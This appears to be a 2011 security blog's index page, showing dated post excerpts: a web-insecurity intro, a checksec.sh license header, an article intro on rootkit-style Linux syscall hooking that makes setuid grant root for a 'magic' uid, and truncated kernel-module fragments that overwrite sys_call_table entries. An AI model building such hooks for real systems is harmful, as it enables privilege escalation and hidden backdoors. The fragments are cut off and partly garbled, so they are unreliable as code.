Aug 18, 2011

Introduction

    Since the late nineties, the Internet has grown at an exponential rate.  One of the biggest spurts in growth came between the years of 1995-2000 with the dot-com bubble that prompted the spawn of e-commerce for virtually every facet of society. The success of the Internet has brought great change to the world as we know it; however, not all of this growth has been productive. With thousands of sites launching daily and limited resources available to monitor the credibility and/or security of these sites the existence of vulnerabilities was inevitable.

Aug 16, 2011

Gandalf Kernel Checking

#!/bin/bash
#
# The BSD License (http://www.opensource.org/licenses/bsd-license.php)
# specifies the terms and conditions of use for checksec.sh:
#
# Copyright (c) 2009-2010, Tobias Klein.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#

Mar 23, 2011

Kernel Mode Testing Plann

--[ 0x01 Introduction

    In this article I will show you the basic technique that rootkits use,
    which we can use to hook system calls in kernel mode. I will deal only
    with Linux 2.6 x86-32 and Linux 2.6 x86-64. In the end we are going to
    hook the setuid system call which when takes a "magic" uid as an
    argument it will give root to the process.


Mar 21, 2011

Credintealist

void cleanup_moint init_module(void)
{
    disable_page_protection();
    ori_mount=sys_call_table[__NR_mount];
    sys_call_table[__NR_mount]=hack_mount;
    enable_page_protection();
    return 

Mar 16, 2011

Redemption

#include <linux/module.h>
#include <linux/kernel.h>
char *pattern="michaless";
void **sys_call_table = (void *)0xc1958140;

asmlinkage int (*ori_unlinkat)(int dirfd,char *pathname,int flags);

asmlinkage int hack_unlinkat(int dirfd,char *pathname,int flags)
{